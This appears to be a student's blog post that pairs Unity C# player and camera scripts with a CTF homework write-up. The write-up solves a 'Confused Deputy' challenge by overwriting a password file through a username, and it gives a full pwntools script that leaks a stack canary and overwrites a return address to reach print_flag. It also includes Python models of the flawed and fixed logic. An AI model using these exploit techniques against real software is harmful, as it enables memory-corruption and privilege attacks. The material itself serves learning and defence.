CTF homework and Unity random stuff

nananana · 28 October 2022

Limited the maximum velocity (so no more clipping through walls) + rotating camera.

However, the camera rotation is horrible, and the terrain asset seems to have some dependency issues :(

I am currently planning to add some collectables with a basic UI, and I'm not sure what comes after that.

Maybe more tutorial videos? Not sure.

// PlayerControl.cs (MovingObject, which provides Jump() and Roll(), lives in another script that is not shown here)
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

public class PlayerControl : MovingObject{
    bool IsJumpKeyPressed;
    bool IsGrounded;
    bool CanDoubleJump;
    int maxVelocity = 15;          // cap on rb.velocity.magnitude; stops tunnelling through walls
    public LayerMask GroundLayer;
    Rigidbody rb;
    void Start(){
        rb = GetComponent<Rigidbody>();
        IsJumpKeyPressed = false;
        IsGrounded = false;
        GroundLayer = LayerMask.GetMask("Ground");
    }
    void Update(){
        // Read input here; the physics response happens in FixedUpdate.
        if(Input.GetButtonDown("Jump") && IsGrounded){
            IsJumpKeyPressed = true;
        }else if(Input.GetButtonDown("Jump") && CanDoubleJump){
            IsJumpKeyPressed = true;
            CanDoubleJump = false;
        }
        if(!CanDoubleJump && IsGrounded){
            CanDoubleJump = true;   // double jump recharges on landing
        }
        Floor();
    }
    //https://answers.unity.com/questions/1458194/proper-way-to-set-a-rigidbodys-maximum-velocity.html
    void FixedUpdate(){
        if(IsJumpKeyPressed){
            Jump(7, rb);
            IsJumpKeyPressed = false;
        }
        // Clamp the speed so one physics step can never carry the body through a collider.
        if(rb.velocity.magnitude > maxVelocity){
            rb.velocity = rb.velocity.normalized * maxVelocity;
        }
        if(IsGrounded)
            Roll(Input.GetAxis("Horizontal"), 0.5f, Input.GetAxis("Vertical"), 0.5f, rb);
    }
    private void Floor(){
        // Grounded when a sphere around the player overlaps the Ground layer.
        IsGrounded = Physics.CheckSphere(transform.position, 0.6f, GroundLayer);
    }
}
// CameraControl.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

//https://stackoverflow.com/questions/54852001/rotate-camera-around-a-gameobject-on-mouse-drag-in-unity
//https://forum.unity.com/threads/rotate-the-camera-around-the-object.47353/

public class CameraControl : MonoBehaviour{
    public GameObject player;
    const float sensitivity = 5f;   // degrees of orbit per unit of mouse movement
    private Vector3 offset;         // camera position relative to the player, refreshed after each orbit step
    void Start(){
        offset = transform.position - player.transform.position;
    }
    void Update(){
        // Orbit the player: yaw around world up, pitch around the camera's own right axis
        // (pitching around world X would drift once the camera has been yawed).
        transform.RotateAround(player.transform.position, Vector3.up, Input.GetAxis("Mouse X") * sensitivity);
        transform.RotateAround(player.transform.position, transform.right, -Input.GetAxis("Mouse Y") * sensitivity);
        // Record the rotated relative position; otherwise LateUpdate snaps the camera back to the old offset
        // and the orbit only changes where the camera looks, not where it sits.
        offset = transform.position - player.transform.position;
    }
    void LateUpdate(){
        // Follow the player after all movement for this frame has been applied.
        transform.position = player.transform.position + offset;
    }
}

======================================

For school homework I finished two CTFs: Confused Deputy and Stack Canary Bypass.

Confused Deputy

Basically, using the privileges of another program, I can carry out privileged operations.

This CTF was actually really easy and I didn't even need to code. The basic directory had the form:

base
|
|--flag
|--passwd
|--executable

The executable receives a username and a password. The SHA-256 hash of the password is generated and compared with the contents of passwd. If they don't match, the password is saved into a new file whose file name is the username.

So we set the username to "passwd", take a random string "abcd", get its SHA-256 value from the internet, and submit that hash as the password; the mismatch makes the program write our hash into a new passwd file.

Then I log in again with the password abcd. Its SHA-256 hash now matches the file, and I get my flag. Done!
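The mismatch-then-write logic above, modelled in Python as an added example (not the CTF binary): the vulnerable version lets the untrusted username pick the file it writes, the hardened version never turns input into a path or persists a password, and compares hashes in constant time. Directory, file contents and the "real-secret" credential are constructed for the demo.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()

def login_vulnerable(base: str, username: str, password: str) -> bool:
    # Mirrors the CTF program: hash the password, compare with base/passwd, and on a
    # mismatch save the password into base/<username>. The file name is attacker-controlled.
    with open(os.path.join(base, "passwd")) as f:
        stored = f.read().strip()
    if sha256_hex(password) == stored:
        return True
    with open(os.path.join(base, username), "w") as f:   # username "passwd" clobbers the credential file
        f.write(password)
    return False

def login_hardened(base: str, username: str, password: str) -> bool:
    # The username never becomes a file name, failed passwords are not written anywhere,
    # and the comparison does not leak timing. (Username lookup would happen elsewhere.)
    with open(os.path.join(base, "passwd")) as f:
        stored = f.read().strip()
    return hmac.compare_digest(sha256_hex(password), stored)

def demo() -> dict:
    results = {}
    for name, login in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        base = tempfile.mkdtemp()               # constructed stand-in for the CTF's base directory
        with open(os.path.join(base, "passwd"), "w") as f:
            f.write(sha256_hex("real-secret"))  # the unknown original credential (constructed)
        # Step 1 from the write-up: username "passwd", password = SHA-256("abcd"); on the
        # vulnerable program the mismatch writes that hash over base/passwd.
        planted = login(base, "passwd", sha256_hex("abcd"))
        # Step 2: log in with "abcd"; succeeds only if the credential file was replaced.
        results[name] = (planted, login(base, "anyone", "abcd"))
    return results
```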

Bypass Stack Canary

This project had grading software with 7 students, indexed 0 to 6. Index 7, however, could still be printed, hence the "ghost student".

Unfortunately we cannot write to the ghost student directly, but we can write to the 6th student and overflow into the ghost student.

Also, after exiting the program there is a "stack smashing detected" message.

This tells us two things.

#1 We are writing on the stack, so we can overwrite the return address.

#2 A stack canary is in place, and it is checked before return.

Looking into the disassembly, I quickly determined that the stack canary was stored at $rsp+0x108. It was very easy to spot, since $rax is loaded from $rsp+0x108 and then compared with $fs + something.

Now, interestingly, this $rsp+0x108 data can be printed (although in integer format) when we print the 7th student. So we can extract this integer value and convert it to the hexadecimal canary value.

Also, disassembling the code, we see that there is a function with print_flag capabilities (this is a CTF after all).

I'm not sure whether the binary prevents execution from the stack (maybe?), but we don't need shellcode anyway.

attack code = (padding) + canary(extracted) + (padding) + address of print_flag

Inject this and we have finished the attack.

from pwn import *
import re

target = "./ghost-student"

context.log_level = 'debug'

io = process(target)
io.recv()
# Print student 7, the ghost student whose printed fields overlap the canary.
io.sendline(b'2')
io.sendline(b'7')
line = io.recv()
# Pull every multi-digit number out of the printed record (field order as observed for this binary).
m = re.findall(r'[0-9][0-9]+', line.decode())
print(m)
print(m[3]) # second
print(m[2]) # first

first_val = int(m[3])        # decimal, as printed
first = hex(first_val)

second_val = int(m[2], 16)   # this field is interpreted as base 16
second = hex(second_val)

print(first)
print(second)

# Layout from above: padding + canary (extracted) + padding + address of print_flag.
attack = b''
attack += b'a' * 16
attack += p64(second_val)
attack += p64(first_val)
attack += b'a' * 24
attack += p64(0x401374)      # print_flag, from the disassembly

# Write to student 6; the oversized input overflows into the ghost student and beyond.
io.sendline(b'3')
io.sendline(b'6')
io.sendline(attack)
io.sendline(b'0')

io.interactive()
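A byte-level model of the ghost-student frame, added here as an example (not the CTF binary): it shows why the off-by-one print bound leaks the canary, why the epilogue check still catches a blind overflow, and how bounding both the index and the write length closes both holes. Slot sizes, the canary and the normal return address are constructed; 0x401374 is the print_flag address from the write-up.

```python
import struct
STUDENTS = 7                    # real records are indices 0..6
SLOT = 8                        # constructed: one 8-byte field per student
CANARY_OFF = STUDENTS * SLOT    # index 7, the "ghost student", lands on the canary
RET_OFF = CANARY_OFF + 16       # constructed: canary, saved frame pointer, return address

def new_frame(canary: int, ret: int) -> bytearray:
    frame = bytearray(RET_OFF + 8)
    struct.pack_into("<Q", frame, CANARY_OFF, canary)
    struct.pack_into("<Q", frame, RET_OFF, ret)
    return frame

def print_student(frame: bytearray, idx: int, fixed: bool = False) -> int:
    # The off-by-one bound (idx <= STUDENTS) is what makes index 7 printable.
    limit = STUDENTS - 1 if fixed else STUDENTS
    if not 0 <= idx <= limit:
        raise IndexError("no such student")
    return struct.unpack_from("<Q", frame, idx * SLOT)[0]

def write_student(frame: bytearray, idx: int, data: bytes, fixed: bool = False) -> None:
    if not 0 <= idx < STUDENTS:
        raise IndexError("no such student")
    if fixed:
        data = data[:SLOT]      # length-checked write cannot leave the record
    frame[idx * SLOT:idx * SLOT + len(data)] = data

def function_return(frame: bytearray, canary: int) -> int:
    # Epilogue check: the stored canary must still equal the fs-held value.
    if struct.unpack_from("<Q", frame, CANARY_OFF)[0] != canary:
        raise RuntimeError("*** stack smashing detected ***")
    return struct.unpack_from("<Q", frame, RET_OFF)[0]

def demo(canary: int = 0x1122334455667700, ret: int = 0x401000, print_flag: int = 0x401374) -> dict:
    leaky = new_frame(canary, ret)
    leaked = print_student(leaky, 7)                       # OOB read of the ghost student
    payload = b"a" * 8 + struct.pack("<Q", leaked) + b"a" * 8 + struct.pack("<Q", print_flag)
    write_student(leaky, 6, payload)                       # overflow from student 6 up to the return address
    with_leak = function_return(leaky, canary)             # check passes, control goes to print_flag
    blind = new_frame(canary, ret)
    write_student(blind, 6, b"a" * len(payload))           # same overflow without knowing the canary
    try:
        function_return(blind, canary)
        detected = False
    except RuntimeError:
        detected = True
    patched = new_frame(canary, ret)
    write_student(patched, 6, payload, fixed=True)         # bounded write leaves canary and ret intact
    return {"leaked_is_canary": leaked == canary, "with_leak": with_leak,
            "blind_detected": detected, "patched_ret": function_return(patched, canary)}
```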
